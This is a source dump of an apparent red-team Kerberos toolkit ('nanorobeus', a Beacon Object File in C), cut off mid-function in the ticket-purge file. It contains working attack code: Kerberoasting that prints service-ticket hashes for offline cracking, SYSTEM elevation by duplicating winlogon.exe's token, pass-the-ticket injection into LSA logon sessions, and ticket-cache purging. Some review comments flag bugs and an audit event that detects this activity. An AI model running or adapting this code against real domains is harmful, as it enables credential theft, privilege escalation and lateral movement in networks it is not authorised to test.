14 | * 15 | * The Original Code and all software distributed under the License are 16 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 | * Please see the License for the specific language governing rights and 21 | * limitations under the License. 22 | * 23 | * @APPLE_LICENSE_HEADER_END@ 24 | */ 25 | /* ==================================================================== 26 | * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 | * 28 | * Redistribution and use in source and binary forms, with or without 29 | * modification, are permitted provided that the following conditions 30 | * are met: 31 | * 32 | * 1. Redistributions of source code must retain the above copyright 33 | * notice, this list of conditions and the following disclaimer. 34 | * 35 | * 2. Redistributions in binary form must reproduce the above copyright 36 | * notice, this list of conditions and the following disclaimer in 37 | * the documentation and/or other materials provided with the 38 | * distribution. 39 | * 40 | * 3. All advertising materials mentioning features or use of this 41 | * software must display the following acknowledgment: 42 | * "This product includes software developed by the Apache Group 43 | * for use in the Apache HTTP server project (http://www.apache.org/)." 44 | * 45 | * 4. The names "Apache Server" and "Apache Group" must not be used to 46 | * endorse or promote products derived from this software without 47 | * prior written permission. For written permission, please contact 48 | * apache@apache.org. 49 | * 50 | * 5. Products derived from this software may not be called "Apache" 51 | * nor may "Apache" appear in their names without prior written 52 | * permission of the Apache Group. 53 | * 54 | * 6. 
Redistributions of any form whatsoever must retain the following 55 | * acknowledgment: 56 | * "This product includes software developed by the Apache Group 57 | * for use in the Apache HTTP server project (http://www.apache.org/)." 58 | * 59 | * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 | * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 | * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 | * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 | * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 | * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 | * OF THE POSSIBILITY OF SUCH DAMAGE. 71 | * ==================================================================== 72 | * 73 | * This software consists of voluntary contributions made by many 74 | * individuals on behalf of the Apache Group and was originally based 75 | * on public domain software written at the National Center for 76 | * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 | * For more information on the Apache Group and the Apache HTTP server 78 | * project, please see . 79 | * 80 | */ 81 | 82 | /* Base64 encoder/decoder. Originally Apache file ap_base64.c 83 | */ 84 | 85 | #include 86 | 87 | #include "base64.h" 88 | 89 | /* aaaack but it's fast and const should make it shared text page. 
*/
/* Reverse lookup table: maps an input byte to its 6-bit value, or 64 for
 * anything that is not a Base64 alphabet character (including NUL). */
static const unsigned char pr2six[256] = {
    /* ASCII table */
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61,
    64, 64, 64, 64, 64, 64, 64, 0,  1,  2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
    22, 23, 24, 25, 64, 64, 64, 64, 64, 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44,
    45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64};

/* Upper bound on the buffer needed to decode bufcoded, including the
 * terminating NUL that Base64decode appends.  The scan stops at the first
 * byte that is not in the Base64 alphabet ('=' padding, NUL, anything
 * else), so the value counts only the leading run of alphabet characters
 * and may exceed the real decoded length by up to two bytes. */
int Base64decode_len(const char* bufcoded) {
    int nbytesdecoded;
    const unsigned char* bufin;
    int nprbytes;

    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63)
        ;

    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;

    return nbytesdecoded + 1;
}

/* Decode bufcoded into bufplain (which must be at least
 * Base64decode_len(bufcoded) bytes) and return the number of decoded
 * bytes, excluding the NUL written after them.  Input is consumed up to
 * the first non-alphabet byte, so '=' padding is never read. */
int Base64decode(char* bufplain, const char* bufcoded) {
    int nbytesdecoded;
    const unsigned char* bufin;
    unsigned char* bufout;
    int nprbytes;

    bufin = (const unsigned char*)bufcoded;
    while (pr2six[*(bufin++)] <= 63)
        ;
    nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
    nbytesdecoded = ((nprbytes + 3) / 4) * 3;

    bufout = (unsigned char*)bufplain;
    bufin = (const unsigned char*)bufcoded;

    /* Full quartets; the last (possibly partial) group is handled below. */
    while (nprbytes > 4) {
        *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
        *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
        *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
        bufin += 4;
        nprbytes -= 4;
    }

    /* Note: (nprbytes == 1) would be an error, so just ignore that case */
    if (nprbytes > 1) {
        *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
    }
    if (nprbytes > 2) {
        *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
    }
    if (nprbytes > 3) {
        *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
    }

    *(bufout++) = '\0';
    /* Correct the rounded-up estimate for a trailing partial group. */
    nbytesdecoded -= (4 - nprbytes) & 3;
    return nbytesdecoded;
}

static const char basis_64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Buffer size needed to encode len bytes: 4 output chars per 3 input bytes,
 * rounded up, plus the terminating NUL. */
int Base64encode_len(int len) { return ((len + 2) / 3 * 4) + 1; }

/* Encode len bytes of string into encoded (sized per Base64encode_len),
 * with '=' padding and a trailing NUL.  Returns the number of bytes written
 * including the NUL. */
int Base64encode(char* encoded, const char* string, int len) {
    int i;
    char* p;

    p = encoded;
    for (i = 0; i < len - 2; i += 3) {
        *p++ = basis_64[(string[i] >> 2) & 0x3F];
        *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)];
        *p++ = basis_64[((string[i + 1] & 0xF) << 2) | ((int)(string[i + 2] & 0xC0) >> 6)];
        *p++ = basis_64[string[i + 2] & 0x3F];
    }
    /* One or two leftover bytes: emit a padded final quartet. */
    if (i < len) {
        *p++ = basis_64[(string[i] >> 2) & 0x3F];
        if (i == (len - 1)) {
            *p++ = basis_64[((string[i] & 0x3) << 4)];
            *p++ = '=';
        } else {
            *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)];
            *p++ = basis_64[((string[i + 1] & 0xF) << 2)];
        }
        *p++ = '=';
    }

    *p++ = '\0';
    return p - encoded;
}

--------------------------------------------------------------------------------
/nanorobeus/src/common.c:
--------------------------------------------------------------------------------
#include "common.h"

// Open the calling thread's impersonation token with DesiredAccess; if the
// thread has no token (ERROR_NO_TOKEN), fall back to the process token.
// Returns NULL when neither can be opened.  Any OpenThreadToken failure
// other than ERROR_NO_TOKEN also yields NULL, since hCurrentToken stays
// unset in that branch.
HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken)) {
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken)) {
                return NULL;
            }
        }
    }
    return hCurrentToken;
}

// Map a Kerberos encryption-type constant to its printable name.
// Returns a static string; "" for anything not in the switch.
char* GetEncryptionTypeString(LONG encType) {
    char* encTypeStr = NULL;
    switch (encType) {
        case DES_CBC_CRC:
            encTypeStr = "DES_CBC_CRC";
            break;
        case DES_CBC_MD4:
            encTypeStr = "DES_CBC_MD4";
            break;
        case DES_CBC_MD5:
            encTypeStr = "DES_CBC_MD5";
            break;
        case DES3_CBC_MD5:
            encTypeStr = "DES3_CBC_MD5";
            break;
        case DES3_CBC_SHA1:
            encTypeStr = "DES3_CBC_SHA1";
            break;
        case DSAWITHSHA1_CMSOID:
            encTypeStr = "DSAWITHSHA1_CMSOID";
            break;
        case MD5WITHRSAENCRYPTION_CMSOID:
            encTypeStr = "MD5WITHRSAENCRYPTION_CMSOID";
            break;
        case SHA1WITHRSAENCRYPTION_CMSOID:
            encTypeStr = "SHA1WITHRSAENCRYPTION_CMSOID";
            break;
        case RC2CBC_ENVOID:
            encTypeStr = "RC2CBC_ENVOID";
            break;
        case RSAENCRYPTION_ENVOID:
            encTypeStr = "RSAENCRYPTION_ENVOID";
            break;
        case RSAES_OAEP_ENV_OID:
            encTypeStr = "RSAES_OAEP_ENV_OID";
            break;
        case DES3_CBC_SHA1_KD:
            encTypeStr = "DES3_CBC_SHA1_KD";
            break;
        case AES128_CTS_HMAC_SHA1:
            encTypeStr = "AES128_CTS_HMAC_SHA1";
            break;
        case AES256_CTS_HMAC_SHA1:
            encTypeStr = "AES256_CTS_HMAC_SHA1";
            break;
        case RC4_HMAC:
            encTypeStr = "RC4_HMAC";
            break;
        case RC4_HMAC_EXP:
            encTypeStr = "RC4_HMAC_EXP";
            break;
        case SUBKEY_KEYMATERIAL:
            encTypeStr = "SUBKEY_KEYMATERIAL";
            break;
        case OLD_EXP:
            encTypeStr = "OLD_EXP";
            break;
        default:
            encTypeStr = "";
            break;
    }
    return encTypeStr;
}

// Convert a 64-bit FILETIME value carried in a LARGE_INTEGER to SYSTEMTIME.
// NOTE(review): the FileTimeToSystemTime result is not checked, so on
// failure the returned struct is uninitialised.
SYSTEMTIME ConvertToSystemtime(LARGE_INTEGER li) {
    FILETIME ft;
    SYSTEMTIME st_utc;
    ft.dwHighDateTime = li.HighPart;
    ft.dwLowDateTime = li.LowPart;
    KERNEL32$FileTimeToSystemTime(&ft, &st_utc);
    return st_utc;
}

// Despite the name, this tests membership in BUILTIN\Administrators rather
// than the token's integrity level.  CheckTokenMembership is called with a
// NULL token, so it examines the caller's current thread/process token;
// the TokenHandle parameter is never used.
BOOL IsHighIntegrity(HANDLE TokenHandle) {
    BOOL b;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID AdministratorsGroup;
    b = ADVAPI32$AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0,
                                          0, 0, 0, 0, &AdministratorsGroup);
    if (b) {
        if (!ADVAPI32$CheckTokenMembership(NULL, AdministratorsGroup, &b)) {
            b = FALSE;
        }
        ADVAPI32$FreeSid(AdministratorsGroup);
    }

    return b;
}

// Report whether a token's user SID is NT AUTHORITY\SYSTEM.
// NOTE(review): GetTokenInformation is given the local hToken, which is
// initialised to NULL and never assigned; the TokenHandle parameter is not
// read.  As written the query is made against a null handle, which looks
// unintended — confirm against the callers (GetLsaHandle below).
BOOL IsSystem(HANDLE TokenHandle) {
    HANDLE hToken = NULL;
    // Inline buffer large enough for a TOKEN_USER plus a maximal SID.
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid;
    BOOL bSystem;

    if (!ADVAPI32$GetTokenInformation(hToken, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid))
        return FALSE;

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);
    ADVAPI32$FreeSid(pSystemSid);
    return bSystem;
}

// Obtain an LSA handle.  With highIntegrity == FALSE this is the ordinary
// untrusted connection (LsaConnectUntrusted).  Otherwise it registers as a
// logon process under the name "Winlogon", retrying under the SYSTEM
// context (via ElevateToSystem) when the first registration yields no
// handle.  The existing comment below records the audit setting and event
// that observe this registration.
// NOTE(review): failures are converted with LsaNtStatusToWinError (or taken
// from GetLastError), so the value returned is a positive Win32 code even
// though the type is NTSTATUS; callers in this tree test it with
// NT_SUCCESS, which is true for any non-negative value.  Also note that
// hLsaLocal is not initialised before the first LsaRegisterLogonProcess
// call and that call's status is discarded.
NTSTATUS GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal;
    LSA_OPERATIONAL_MODE mode = 0;
    NTSTATUS status = STATUS_SUCCESS;
    if (!highIntegrity) {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
        if (!NT_SUCCESS(status)) {
            status = ADVAPI32$LsaNtStatusToWinError(status);
        }
    } else {
        // AuditPol.exe /set /subcategory:"Security System Extension"
        // /success:enable /failure:enable Event ID 4611 Note: detect elevation via
        // winlogon.exe.
        char* name = "Winlogon";
        STRING lsaString = (STRING){.Length = 8, .MaximumLength = 9, .Buffer = name};
        SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
        if (hLsaLocal == NULL) {
            if (IsSystem(hToken)) {
                status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
                if (!NT_SUCCESS(status)) {
                    status = ADVAPI32$LsaNtStatusToWinError(status);
                }
            } else {
                if (ElevateToSystem()) {
                    status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
                    if (!NT_SUCCESS(status)) {
                        status = ADVAPI32$LsaNtStatusToWinError(status);
                    }
                    // Drop the impersonation regardless of the registration result.
                    ADVAPI32$RevertToSelf();
                } else {
                    status = KERNEL32$GetLastError();
                }
            }
        }
    }

    *hLsa = hLsaLocal;
    return status;
}

// Return the PID of the first process whose image name equals processName
// (exact, case-sensitive wcscmp), or -1 if none is found or the snapshot
// fails.  The snapshot handle is closed on every path.
int GetProcessIdByName(WCHAR* processName) {
    HANDLE hProcessSnap;
    PROCESSENTRY32W pe32;
    int pid = -1;

    hProcessSnap = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        return pid;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32W);
    if (!KERNEL32$Process32FirstW(hProcessSnap, &pe32)) {
        KERNEL32$CloseHandle(hProcessSnap);
        return pid;
    }

    do {
        WCHAR* procName = pe32.szExeFile;
        if (MSVCRT$wcscmp(procName, processName) == 0) {
            pid = pe32.th32ProcessID;
            break;
        }

    } while (KERNEL32$Process32NextW(hProcessSnap, &pe32));
    KERNEL32$CloseHandle(hProcessSnap);
    return pid;
}

// Make the calling thread impersonate the primary token of winlogon.exe:
// open the process, open its token for TOKEN_DUPLICATE, duplicate it as an
// impersonation token and call ImpersonateLoggedOnUser.  Returns TRUE only
// if the impersonation call succeeded; the caller is expected to
// RevertToSelf (GetLsaHandle does).  This is the activity the Event ID
// 4611 note in GetLsaHandle refers to.  All handles are closed before
// returning.
BOOL ElevateToSystem() {
    int pid = GetProcessIdByName(L"winlogon.exe");
    if (pid == -1) {
        return FALSE;
    }
    BOOL res = FALSE;
    HANDLE hProcess = KERNEL32$OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
    if (hProcess != NULL) {
        HANDLE hDupToken;
        HANDLE hToken;
        if (ADVAPI32$OpenProcessToken(hProcess, TOKEN_DUPLICATE, &hToken)) {
            if (hToken != NULL) {
                if (ADVAPI32$DuplicateToken(hToken, SecurityImpersonation, &hDupToken)) {
                    if (ADVAPI32$ImpersonateLoggedOnUser(hDupToken)) {
                        res = TRUE;
                    }
                    KERNEL32$CloseHandle(hDupToken);
                }
                KERNEL32$CloseHandle(hToken);
            }
        }

        KERNEL32$CloseHandle(hProcess);
    }
    return res;
}

// Convert a UNICODE_STRING (Length is in bytes) to a freshly calloc'd,
// NUL-terminated narrow string via wcstombs.  Caller frees the result.
// NOTE(review): on allocation failure a string literal is returned, which
// a caller that unconditionally free()s would misuse.
char* GetNarrowStringFromUnicode(UNICODE_STRING src) {
    int len = src.Length / sizeof(WCHAR);
    char* dest = (char*)MSVCRT$calloc(len + 1, sizeof(char));
    if (dest == NULL) {
        return "(mem_alloc_error)";
    }
    MSVCRT$wcstombs(dest, src.Buffer, len);
    dest[len] = '\0';
    return dest;
}

// Convert a NUL-terminated wide string to a calloc'd narrow string.
// Caller frees the result; same literal-on-failure caveat as above.
char* GetNarrowString(WCHAR* src) {
    int len = MSVCRT$wcslen(src);
    char* dest = (char*)MSVCRT$calloc(len + 1, sizeof(char));
    if (dest == NULL) {
        return "(mem_alloc_error)";
    }
    MSVCRT$wcstombs(dest, src, len);
    dest[len] = '\0';
    return dest;
}

// Convert a NUL-terminated narrow string to a calloc'd wide string, or
// NULL on allocation failure.  calloc zero-fills, so the extra element
// acts as the terminator.  Caller frees the result.
WCHAR* GetWideString(char* src) {
    int len = MSVCRT$strlen(src);
    WCHAR* dest = (WCHAR*)MSVCRT$calloc(len + 1, sizeof(WCHAR));
    if (dest == NULL) {
        return NULL;
    }
    MSVCRT$mbstowcs(dest, src, len);
    return dest;
}
--------------------------------------------------------------------------------
/nanorobeus/src/kerberoast.c:
--------------------------------------------------------------------------------
#include "kerberoast.h"
#include "tgtdeleg.h"

// Request an AP-REQ for spn (RequestApReq, tgtdeleg.c), locate the
// Kerberos OID inside it, unpack the AP-REQ with the ASN.1 module and print
// the service ticket's encrypted part in "$krb5tgs$" form.  Only etypes
// 17/18 (AES) and 23 (RC4) are formatted; others print the etype name.
// NOTE(review): tokID is dereferenced before it is checked; if SearchOID
// signals "not found" with NULL this crashes before the "Kerberos OID not
// found" branch is reached — verify against SearchOID.
void execute_kerberoast(WCHAR** dispatch, char* spn) {
    PUCHAR apreq;
    ULONG apreqSize;
    PRINT(dispatch, "[*] Target SPN: %s\n", spn);
    LONG status = RequestApReq(spn, &apreq, &apreqSize, FALSE);
    if (status == 0) {
        PBYTE tokID = SearchOID(apreq, apreqSize);
        if (*(PUSHORT)tokID == 0x0001) {
            PKERB_AP_REQUEST apRequest;
            KERBERR kerbError;
            // Shrink the size to the bytes following the OID.
            apreqSize -= (LONG)(tokID - (PBYTE)apreq);
            ASN1module_t module = KRB5_Module_Startup();
            if (module != NULL) {
                kerbError = KerbUnpackData(module, tokID + sizeof(SHORT), apreqSize, KERB_AP_REQUEST_PDU, &apRequest);
                if (KERB_SUCCESS(kerbError)) {
                    int encType = apRequest->ticket.encrypted_part.encryption_type;
                    int cipherTextSize = apRequest->ticket.encrypted_part.cipher_text.length;
                    UCHAR* cipherText = apRequest->ticket.encrypted_part.cipher_text.value;
                    KERB_PRINCIPAL_NAME_name_string_Seq service = apRequest->ticket.server_name.name_string->value;
                    KERB_PRINCIPAL_NAME_name_string_Seq host = apRequest->ticket.server_name.name_string->next->value;
                    KERB_REALM domain = apRequest->ticket.realm;

                    if (encType == 17 || encType == 18) {
                        PRINT(dispatch, "[*] Note: Specify valid username instead of 'USER'\n");
                        PRINT(dispatch, "[+] Hash: ");
                        PRINT(dispatch, "$krb5tgs$%d$USER$%s$*%s/%s*$", encType, domain, service, host);
                        // AES: trailing 12 bytes first, then the remainder.
                        for (int i = cipherTextSize - 12; i < cipherTextSize; i++) {
                            PRINT(dispatch, "%.2x", cipherText[i]);
                        }
                        PRINT(dispatch, "$");
                        for (int i = 0; i < cipherTextSize - 12; i++) {
                            PRINT(dispatch, "%.2x", cipherText[i]);
                        }
                        PRINT(dispatch, "\n");
                    } else if (encType == 23) {
                        PRINT(dispatch, "[+] Hash: ");
                        PRINT(dispatch, "$krb5tgs$%d$*$%s$%s/%s*$", encType, domain, service, host);
                        // RC4: a '$' separator is inserted after the first 16 bytes.
                        for (int i = 0; i < cipherTextSize; i++) {
                            if (i == 16) {
                                PRINT(dispatch, "$");
                            }
                            PRINT(dispatch, "%.2x", cipherText[i]);
                        }
                        PRINT(dispatch, "\n");
                    } else {
                        PRINT(dispatch, "[!] Unsupported encryption type: %s\n", GetEncryptionTypeString(encType));
                    }
                    KerbFreeData(module, KERB_AP_REQUEST_PDU, apRequest);
                } else {
                    PRINT(dispatch, "[!] Failed to unpack AP-REQ: 0x%x\n", kerbError);
                }
                KRB5_Module_Cleanup(module);
            } else {
                PRINT(dispatch, "[!] Could not create ASN.1 module\n");
            }
            MSVCRT$free(apreq);
        } else {
            PRINT(dispatch, "[!] Kerberos OID not found\n");
        }
    } else {
        PRINT(dispatch, "[!] Failed to request AP-REQ: 0x%x\n", status);
    }
}
--------------------------------------------------------------------------------
/nanorobeus/src/luid.c:
--------------------------------------------------------------------------------
#include "luid.h"

// Print the logon-session LUID of hToken, or the last error if it cannot
// be read.  Frees the LUID allocated by GetCurrentLUID.
void execute_luid(WCHAR** dispatch, HANDLE hToken) {
    LUID* currentLUID = GetCurrentLUID(hToken);
    if (currentLUID == NULL) {
        PRINT(dispatch, "[!] Unable to get current session LUID: %ld\n", KERNEL32$GetLastError());
        return;
    }
    PRINT(dispatch, "[+] Current LogonId: %lx:0x%lx\n\n", currentLUID->HighPart, currentLUID->LowPart);
    MSVCRT$free(currentLUID);
}

// Return a calloc'd copy of the AuthenticationId (logon session LUID) from
// the token's TOKEN_STATISTICS, or NULL if the query or the allocation
// fails.  Caller frees.
LUID* GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize)) {
        return NULL;
    }

    LUID* luid = MSVCRT$calloc(1, sizeof(LUID));
    if (luid == NULL) {
        return NULL;
    }
    luid->HighPart = tokenStats.AuthenticationId.HighPart;
    luid->LowPart = tokenStats.AuthenticationId.LowPart;
    return luid;
}
--------------------------------------------------------------------------------
/nanorobeus/src/ptt.c:
--------------------------------------------------------------------------------
#include "ptt.h"

// Submit a base64-encoded KRB-CRED (ticket) to the Kerberos authentication
// package with KerbSubmitTicketMessage.  With currentLuid the request is
// made over an untrusted LSA connection and LogonId is left zero (the
// caller's own session); otherwise the caller must be an administrator and
// luid selects the target session.
// NOTE(review): the byte count returned by Base64decode is discarded and
// KerbCredSize carries decoded_len, the upper bound from Base64decode_len
// (which includes the terminating NUL), so the submitted blob may carry a
// few trailing zero bytes.  The response buffer from
// LsaCallAuthenticationPackage is never released with LsaFreeReturnBuffer.
void execute_ptt(WCHAR** dispatch, HANDLE hToken, char* ticket, LUID luid, BOOL currentLuid) {
    BOOL highIntegrity = IsHighIntegrity(hToken);
    if (!highIntegrity && !currentLuid) {
        PRINT(dispatch, "[!] Not in high integrity.\n");
        return;
    }
    HANDLE hLsa;
    if (currentLuid) {
        highIntegrity = FALSE;
    }
    NTSTATUS status = GetLsaHandle(hToken, highIntegrity, &hLsa);
    if (!NT_SUCCESS(status)) {
        PRINT(dispatch, "[!] GetLsaHandle %ld\n", status);
        return;
    }
    ULONG authPackage;
    LSA_STRING krbAuth = {.Buffer = "kerberos", .Length = 8, .MaximumLength = 9};
    status = SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage);
    if (!NT_SUCCESS(status)) {
        PRINT(dispatch, "[!] LsaLookupAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
        SECUR32$LsaDeregisterLogonProcess(hLsa);
        return;
    }

    int decoded_len = Base64decode_len(ticket);
    char* decoded = (char*)MSVCRT$calloc(decoded_len, sizeof(char));
    if (decoded == NULL) {
        PRINT(dispatch, "[!] Base64 - could not allocate the memory.\n");
        SECUR32$LsaDeregisterLogonProcess(hLsa);
        return;
    }
    Base64decode(decoded, ticket);
    KERB_SUBMIT_TKT_REQUEST* submitRequest = NULL;
    int submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + decoded_len;
    // NOTE(review): this allocates submitSize * sizeof(KERB_SUBMIT_TKT_REQUEST)
    // bytes, far more than the submitSize bytes actually used.
    submitRequest = (KERB_SUBMIT_TKT_REQUEST*)MSVCRT$calloc(submitSize, sizeof(KERB_SUBMIT_TKT_REQUEST));
    if (submitRequest == NULL) {
        PRINT(dispatch, "[!] KERB_SUBMIT_TKT_REQUEST - could not allocate memory.\n");
        MSVCRT$free(decoded);
        SECUR32$LsaDeregisterLogonProcess(hLsa);
        return;
    }
    submitRequest->MessageType = _KerbSubmitTicketMessage;
    submitRequest->KerbCredSize = decoded_len;
    submitRequest->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST);
    if (highIntegrity) {
        submitRequest->LogonId = luid;
    }
    // The credential blob follows the fixed header at KerbCredOffset.
    MSVCRT$memcpy((PBYTE)submitRequest + submitRequest->KerbCredOffset, decoded, decoded_len);
    MSVCRT$free(decoded);
    NTSTATUS protocolStatus;
    ULONG responseSize;
    PVOID response;
    status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, submitRequest, submitSize, &response,
                                                  &responseSize, &protocolStatus);
    if (NT_SUCCESS(status)) {
        if (NT_SUCCESS(protocolStatus)) {
            PRINT(dispatch, "[+] Ticket successfully imported.\n");
        } else {
            status = ADVAPI32$LsaNtStatusToWinError(protocolStatus);
            PRINT(dispatch, "[!] LsaCallAuthenticationPackage ProtocolStatus: %ld\n", status);
        }
    } else {
        status = ADVAPI32$LsaNtStatusToWinError(status);
        PRINT(dispatch, "[!] LsaCallAuthenticationPackage Status: %ld\n", status);
    }

    if (submitRequest != NULL) {
        MSVCRT$free(submitRequest);
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}
--------------------------------------------------------------------------------
/nanorobeus/src/purge.c:
--------------------------------------------------------------------------------
#include "purge.h"

// Send KerbPurgeTicketCacheMessage with empty RealmName/ServerName, which
// clears the whole ticket cache of the selected logon session: luid when
// the caller is an administrator and currentLuid is FALSE, otherwise LUID
// 0:0 (the caller's own session) over an untrusted connection.
// NOTE(review): purgeResponse is never released with LsaFreeReturnBuffer.
void execute_purge(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid) {
    ULONG authPackage;
    HANDLE hLsa;
    void* purgeResponse;
    ULONG responseSize;
    NTSTATUS protocolStatus;

    BOOL highIntegrity = IsHighIntegrity(hToken);
    if (!highIntegrity && !currentLuid) {
        PRINT(dispatch, "[!] Not in high integrity.\n");
        return;
    }

    if (currentLuid) {
        highIntegrity = FALSE;
    }

    NTSTATUS status = GetLsaHandle(hToken, highIntegrity, &hLsa);
    if (!NT_SUCCESS(status)) {
        PRINT(dispatch, "[!] GetLsaHandle %ld\n", status);
        return;
    }
    LSA_STRING krbAuth = {.Buffer = "kerberos", .Length = 8, .MaximumLength = 9};
    status = SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage);
    if (!NT_SUCCESS(status)) {
        PRINT(dispatch, "[!] LsaLookupAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
        SECUR32$LsaDeregisterLogonProcess(hLsa);
        return;
    }
    KERB_PURGE_TKT_CACHE_REQUEST purgeRequest;
    purgeRequest.MessageType = KerbPurgeTicketCacheMessage;
    if (highIntegrity) {
        purgeRequest.LogonId = luid;
    } else {
        purgeRequest.LogonId = (LUID){.HighPart = 0, .LowPart = 0};
    }
    purgeRequest.RealmName = (UNICODE_STRING){.Buffer = L"", .Length = 0, .MaximumLength = 1};
    purgeRequest.ServerName = (UNICODE_STRING){.Buffer = L"", .Length = 0, .MaximumLength = 1};
    status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, &purgeRequest,
